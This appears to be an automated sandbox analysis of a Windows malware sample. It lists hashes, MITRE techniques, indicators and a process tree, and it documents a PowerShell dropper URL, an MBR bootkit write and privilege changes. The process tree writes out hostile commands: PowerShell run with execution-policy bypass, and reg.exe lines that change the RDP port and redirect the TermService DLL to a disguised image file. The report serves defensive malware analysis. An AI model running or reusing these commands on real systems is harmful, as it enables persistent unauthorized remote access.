2214bdc78b558176a17484bcc02079a5470e0b49073d50d19b522d67dc4396e3

Analysis

max time kernel
128s
max time network
117s
platform
windows10_x64
resource
win10v20210410
submitted
30-07-2021 15:26

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
Size

9.2MB
MD5

5e12e56a643c71b913ea60f48f28726d
SHA1

8fd9ef3e15b545335c9cf8a16e7d49bdedc7b6fd
SHA256

79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d
SHA512

807888068394b8072d607a83b7a181f5018c21c1efd2b8ae433ac59dc28bfbec23e1b13d8b6a2447a3ff8bb9b7ecd71d4d7bff55903a2d23a60b817142c9bae3

Score

10^/10

bootkit persistence upx

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://raw.githubusercontent.com/sqlitey/sqlite/master/speed.ps1

Signatures

Grants admin privileges 1 TTPs
Uses net.exe to modify the user's privileges.

Account Manipulation
T1098

Blocklisted process makes network request 9 IoCs

Processes:

powershell.exe

flow	pid	process
17	4956	powershell.exe
19	4956	powershell.exe
20	4956	powershell.exe
21	4956	powershell.exe
23	4956	powershell.exe
25	4956	powershell.exe
27	4956	powershell.exe
29	4956	powershell.exe
31	4956	powershell.exe

Executes dropped EXE 4 IoCs

Processes:

ViJoy.exeexe2.exeexe1.exeNFWCHK.exe

pid process

3160 ViJoy.exe
988 exe2.exe
3420 exe1.exe
2100 NFWCHK.exe
Modifies RDP port number used by Windows 1 TTPs

Remote Desktop Protocol
T1076
Sets DLL path for service in the registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

pid	process
3160	ViJoy.exe
988	exe2.exe
3420	exe1.exe
2100	NFWCHK.exe

UPX packed file 2 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
\Windows\Branding\mediasrv.png	upx
\Windows\Branding\mediasvc.png	upx

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

Processes:

79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe

description	ioc	process
Key value queried	\REGISTRY\USER\S-1-5-21-3686645723-710336880-414668232-1000\Control Panel\International\Geo\Nation	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe

Deletes itself 1 IoCs

Processes:

powershell.exe

pid process

1752 powershell.exe
Loads dropped DLL 2 IoCs

Processes:

pid process

4148
4148
Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs
Bootkits write to the MBR to gain persistence at a level below the operating system.
bootkit persistence

Bootkit
T1067

Processes:

exe2.exe

description ioc process

File opened for modification \??\PhysicalDrive0 exe2.exe

pid	process
4148
4148

description	ioc	process
File opened for modification	\??\PhysicalDrive0	exe2.exe

Drops file in Program Files directory 4 IoCs

Processes:

powershell.exe

description	ioc	process
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE40.UserAgent\IE40.UserAgent.INI	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.DAT	powershell.exe
File opened for modification	C:\Program Files\Uninstall Information\IE.HKCUZoneInfo\IE.HKCUZoneInfo.INI	powershell.exe

Drops file in Windows directory 19 IoCs

Processes:

powershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\branding\Basebrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_ioi34byk.iwq.ps1	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log	powershell.exe
File created	C:\Windows\branding\mediasrv.png	powershell.exe
File created	C:\Windows\branding\mediasvc.png	powershell.exe
File created	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\branding\wupsvc.jpg	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85D2.tmp	powershell.exe
File created	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Temp\__PSScriptPolicyTest_vaeiksoi.ivg.psm1	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI8591.tmp	powershell.exe
File created	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\TMP4352$.TMP	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85B1.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85C2.tmp	powershell.exe
File opened for modification	C:\Windows\SERVIC~2\NETWOR~1\AppData\Local\Temp\RGI85D3.tmp	powershell.exe
File opened for modification	C:\Windows\ServiceProfiles\NetworkService\AppData\Local\Microsoft\Windows\INetCache\counters2.dat	powershell.exe
File opened for modification	C:\Windows\branding\ShellBrd	powershell.exe
File opened for modification	C:\Windows\branding\mediasrv.png	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exeWMIC.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Icon = "inetcpl.cpl#00004481"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Description = "Your computer"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\https = "3"	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZonesSecurityUpgrade = 339704ea112ed701	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0\ef29a4ec885fa451 = 2c0053006f006600740077006100720065005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073002c00550073006500720020004100670065006e0074002c000000010054004d006f007a0069006c006c0061002f0035002e0030002000280063006f006d00700061007400690062006c0065003b0020004d00530049004500200039002e0030003b002000570069006e003300320029000000000000000000	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\@ivt = "1"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\CurrentLevel = "66816"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\DisplayName = "Trusted sites"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\CurrentLevel = "69632"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\DisplayName = "Internet"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Icon = "inetcpl.cpl#001313"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\PMDisplayName = "Local intranet [Protected Mode]"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\CurrentLevel = "73728"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\User Agent = "Mozilla/4.0 (compatible; MSIE 8.0; Win32)"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\Flags = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\1200 = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\Icon = "shell32.dll#0016"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\1400 = "1"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Classes\Local Settings\MuiCache	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\LowIcon = "inetcpl.cpl#005425"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\1200 = "3"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\DisplayName = "Computer"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\Description = "This zone contains Web sites that you trust not to damage your computer or data."	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\CurrentLevel = "70912"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\DisplayName = "Local intranet"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE40.UserAgent\RegBackup\0.map	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\1\Flags = "219"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\PMDisplayName = "Restricted sites [Protected Mode]"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\LowIcon = "inetcpl.cpl#005422"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	WMIC.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\4\LowIcon = "inetcpl.cpl#005426"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Advanced INF Setup\IE.HKCUZoneInfo\RegBackup\0\57fd7ae31ab34c2c = 2c0053004f004600540057004100520045005c004d006900630072006f0073006f00660074005c00570069006e0064006f00770073005c00430075007200720065006e007400560065007200730069006f006e005c0049006e007400650072006e00650074002000530065007400740069006e00670073005c0035002e0030005c00430061006300680065002c000000	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\0\Flags = "33"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults\ftp = "3"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\0\CurrentLevel = "0"	powershell.exe
Set value (int)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\CurrentLevel = "0"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\2\LowIcon = "inetcpl.cpl#005424"	powershell.exe
Set value (str)	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Lockdown_Zones\3\Description = "This zone contains all Web sites you haven't placed in other zones"	powershell.exe
Key created	\REGISTRY\USER\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProtocolDefaults	powershell.exe

Modifies registry class 1 IoCs

Processes:

79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Classes\CLSID\{1f3427c8-5c10-4210-aa03-2ee45287d668}\Instance	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe

Modifies registry key 1 TTPs 1 IoCs

Modify Registry
T1112

Processes:

reg.exe

pid process

4852 reg.exe
Runs net.exe

pid	process
4852	reg.exe

Script User-Agent 4 IoCs

Uses user-agent string associated with script host/environment.

Processes:

description	flow	ioc
HTTP User-Agent header	19	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	20	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	21	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
HTTP User-Agent header	23	Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Suspicious behavior: EnumeratesProcesses 18 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

pid	process
1752	powershell.exe
1752	powershell.exe
1752	powershell.exe
2392	powershell.exe
2392	powershell.exe
2392	powershell.exe
4140	powershell.exe
4140	powershell.exe
4140	powershell.exe
4416	powershell.exe
4416	powershell.exe
4416	powershell.exe
1752	powershell.exe
1752	powershell.exe
1752	powershell.exe
4956	powershell.exe
4956	powershell.exe
4956	powershell.exe

Suspicious behavior: LoadsDriver 2 IoCs

Processes:

pid process

616
616

pid	process
616
616

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	1752	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeIncreaseQuotaPrivilege	2392	powershell.exe
Token: SeSecurityPrivilege	2392	powershell.exe
Token: SeTakeOwnershipPrivilege	2392	powershell.exe
Token: SeLoadDriverPrivilege	2392	powershell.exe
Token: SeSystemProfilePrivilege	2392	powershell.exe
Token: SeSystemtimePrivilege	2392	powershell.exe
Token: SeProfSingleProcessPrivilege	2392	powershell.exe
Token: SeIncBasePriorityPrivilege	2392	powershell.exe
Token: SeCreatePagefilePrivilege	2392	powershell.exe
Token: SeBackupPrivilege	2392	powershell.exe
Token: SeRestorePrivilege	2392	powershell.exe
Token: SeShutdownPrivilege	2392	powershell.exe
Token: SeDebugPrivilege	2392	powershell.exe
Token: SeSystemEnvironmentPrivilege	2392	powershell.exe
Token: SeRemoteShutdownPrivilege	2392	powershell.exe
Token: SeUndockPrivilege	2392	powershell.exe
Token: SeManageVolumePrivilege	2392	powershell.exe
Token: 33	2392	powershell.exe
Token: 34	2392	powershell.exe
Token: 35	2392	powershell.exe
Token: 36	2392	powershell.exe
Token: SeDebugPrivilege	4140	powershell.exe
Token: SeIncreaseQuotaPrivilege	4140	powershell.exe
Token: SeSecurityPrivilege	4140	powershell.exe
Token: SeTakeOwnershipPrivilege	4140	powershell.exe
Token: SeLoadDriverPrivilege	4140	powershell.exe
Token: SeSystemProfilePrivilege	4140	powershell.exe
Token: SeSystemtimePrivilege	4140	powershell.exe
Token: SeProfSingleProcessPrivilege	4140	powershell.exe
Token: SeIncBasePriorityPrivilege	4140	powershell.exe
Token: SeCreatePagefilePrivilege	4140	powershell.exe
Token: SeBackupPrivilege	4140	powershell.exe
Token: SeRestorePrivilege	4140	powershell.exe
Token: SeShutdownPrivilege	4140	powershell.exe
Token: SeDebugPrivilege	4140	powershell.exe
Token: SeSystemEnvironmentPrivilege	4140	powershell.exe
Token: SeRemoteShutdownPrivilege	4140	powershell.exe
Token: SeUndockPrivilege	4140	powershell.exe
Token: SeManageVolumePrivilege	4140	powershell.exe
Token: 33	4140	powershell.exe
Token: 34	4140	powershell.exe
Token: 35	4140	powershell.exe
Token: 36	4140	powershell.exe
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeIncreaseQuotaPrivilege	4416	powershell.exe
Token: SeSecurityPrivilege	4416	powershell.exe
Token: SeTakeOwnershipPrivilege	4416	powershell.exe
Token: SeLoadDriverPrivilege	4416	powershell.exe
Token: SeSystemProfilePrivilege	4416	powershell.exe
Token: SeSystemtimePrivilege	4416	powershell.exe
Token: SeProfSingleProcessPrivilege	4416	powershell.exe
Token: SeIncBasePriorityPrivilege	4416	powershell.exe
Token: SeCreatePagefilePrivilege	4416	powershell.exe
Token: SeBackupPrivilege	4416	powershell.exe
Token: SeRestorePrivilege	4416	powershell.exe
Token: SeShutdownPrivilege	4416	powershell.exe
Token: SeDebugPrivilege	4416	powershell.exe
Token: SeSystemEnvironmentPrivilege	4416	powershell.exe
Token: SeRemoteShutdownPrivilege	4416	powershell.exe
Token: SeUndockPrivilege	4416	powershell.exe
Token: SeManageVolumePrivilege	4416	powershell.exe
Token: 33	4416	powershell.exe

Suspicious use of SetWindowsHookEx 2 IoCs

Processes:

exe2.exe

pid process

988 exe2.exe
988 exe2.exe

pid	process
988	exe2.exe
988	exe2.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exeViJoy.exeexe1.exeexe2.exepowershell.execsc.exenet.execmd.execmd.exenet.execmd.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.execmd.exenet.exe

description	pid	process	target process
PID 1868 wrote to memory of 3160	1868	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe	ViJoy.exe
PID 1868 wrote to memory of 3160	1868	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe	ViJoy.exe
PID 1868 wrote to memory of 3160	1868	79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe	ViJoy.exe
PID 3160 wrote to memory of 3420	3160	ViJoy.exe	exe1.exe
PID 3160 wrote to memory of 3420	3160	ViJoy.exe	exe1.exe
PID 3160 wrote to memory of 988	3160	ViJoy.exe	exe2.exe
PID 3160 wrote to memory of 988	3160	ViJoy.exe	exe2.exe
PID 3160 wrote to memory of 988	3160	ViJoy.exe	exe2.exe
PID 3420 wrote to memory of 1752	3420	exe1.exe	powershell.exe
PID 3420 wrote to memory of 1752	3420	exe1.exe	powershell.exe
PID 988 wrote to memory of 2100	988	exe2.exe	NFWCHK.exe
PID 988 wrote to memory of 2100	988	exe2.exe	NFWCHK.exe
PID 1752 wrote to memory of 4016	1752	powershell.exe	csc.exe
PID 1752 wrote to memory of 4016	1752	powershell.exe	csc.exe
PID 4016 wrote to memory of 1036	4016	csc.exe	cvtres.exe
PID 4016 wrote to memory of 1036	4016	csc.exe	cvtres.exe
PID 1752 wrote to memory of 2392	1752	powershell.exe	powershell.exe
PID 1752 wrote to memory of 2392	1752	powershell.exe	powershell.exe
PID 1752 wrote to memory of 4140	1752	powershell.exe	powershell.exe
PID 1752 wrote to memory of 4140	1752	powershell.exe	powershell.exe
PID 1752 wrote to memory of 4416	1752	powershell.exe	powershell.exe
PID 1752 wrote to memory of 4416	1752	powershell.exe	powershell.exe
PID 1752 wrote to memory of 4832	1752	powershell.exe	reg.exe
PID 1752 wrote to memory of 4832	1752	powershell.exe	reg.exe
PID 1752 wrote to memory of 4852	1752	powershell.exe	reg.exe
PID 1752 wrote to memory of 4852	1752	powershell.exe	reg.exe
PID 1752 wrote to memory of 4872	1752	powershell.exe	reg.exe
PID 1752 wrote to memory of 4872	1752	powershell.exe	reg.exe
PID 1752 wrote to memory of 5052	1752	powershell.exe	net.exe
PID 1752 wrote to memory of 5052	1752	powershell.exe	net.exe
PID 5052 wrote to memory of 5072	5052	net.exe	net1.exe
PID 5052 wrote to memory of 5072	5052	net.exe	net1.exe
PID 1752 wrote to memory of 5104	1752	powershell.exe	cmd.exe
PID 1752 wrote to memory of 5104	1752	powershell.exe	cmd.exe
PID 5104 wrote to memory of 4100	5104	cmd.exe	cmd.exe
PID 5104 wrote to memory of 4100	5104	cmd.exe	cmd.exe
PID 4100 wrote to memory of 680	4100	cmd.exe	net.exe
PID 4100 wrote to memory of 680	4100	cmd.exe	net.exe
PID 680 wrote to memory of 4016	680	net.exe	net1.exe
PID 680 wrote to memory of 4016	680	net.exe	net1.exe
PID 1752 wrote to memory of 2784	1752	powershell.exe	cmd.exe
PID 1752 wrote to memory of 2784	1752	powershell.exe	cmd.exe
PID 2784 wrote to memory of 4112	2784	cmd.exe	cmd.exe
PID 2784 wrote to memory of 4112	2784	cmd.exe	cmd.exe
PID 4112 wrote to memory of 4120	4112	cmd.exe	net.exe
PID 4112 wrote to memory of 4120	4112	cmd.exe	net.exe
PID 4120 wrote to memory of 3204	4120	net.exe	net1.exe
PID 4120 wrote to memory of 3204	4120	net.exe	net1.exe
PID 4268 wrote to memory of 4312	4268	cmd.exe	net.exe
PID 4268 wrote to memory of 4312	4268	cmd.exe	net.exe
PID 4312 wrote to memory of 4332	4312	net.exe	net1.exe
PID 4312 wrote to memory of 4332	4312	net.exe	net1.exe
PID 4352 wrote to memory of 4220	4352	cmd.exe	net.exe
PID 4352 wrote to memory of 4220	4352	cmd.exe	net.exe
PID 4220 wrote to memory of 4192	4220	net.exe	net1.exe
PID 4220 wrote to memory of 4192	4220	net.exe	net1.exe
PID 4244 wrote to memory of 4168	4244	cmd.exe	net.exe
PID 4244 wrote to memory of 4168	4244	cmd.exe	net.exe
PID 4168 wrote to memory of 4160	4168	net.exe	net1.exe
PID 4168 wrote to memory of 4160	4168	net.exe	net1.exe
PID 4432 wrote to memory of 4560	4432	cmd.exe	net.exe
PID 4432 wrote to memory of 4560	4432	cmd.exe	net.exe
PID 4560 wrote to memory of 4576	4560	net.exe	net1.exe
PID 4560 wrote to memory of 4576	4560	net.exe	net1.exe

C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe
"C:\Users\Admin\AppData\Local\Temp\79745c2263c8abe5b916e39e577652c029b5b586e7ccb39ee63ed0fc1568c39d.exe"
1⤵
- Checks computer location settings
- Modifies registry class
- Suspicious use of WriteProcessMemory
PID:1868

C:\Users\Admin\AppData\Local\Temp\ViJoy.exe
"C:\Users\Admin\AppData\Local\Temp\ViJoy.exe"
2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3160

C:\Users\Admin\AppData\Roaming\Templers\exe2.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe2.exe"
3⤵
- Executes dropped EXE
- Writes to the Master Boot Record (MBR)
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:988

C:\Users\Public\Documents\Wondershare\NFWCHK.exe
C:\Users\Public\Documents\Wondershare\NFWCHK.exe
4⤵
- Executes dropped EXE
PID:2100

C:\Users\Admin\AppData\Roaming\Templers\exe1.exe
"C:\Users\Admin\AppData\Roaming\Templers\exe1.exe"
3⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:3420

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'
4⤵
- Deletes itself
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1752

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\wjdjg0xd\wjdjg0xd.cmdline"
5⤵
- Suspicious use of WriteProcessMemory
PID:4016

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES4730.tmp" "c:\Users\Admin\AppData\Local\Temp\wjdjg0xd\CSC811B30464E124A8BB81DC0AA3893821C.TMP"
6⤵
PID:1036

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2392

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4140

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile
5⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4416

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f
5⤵
PID:4832

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f
5⤵
- Modifies registry key
PID:4852

C:\Windows\system32\reg.exe
"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f
5⤵
PID:4872

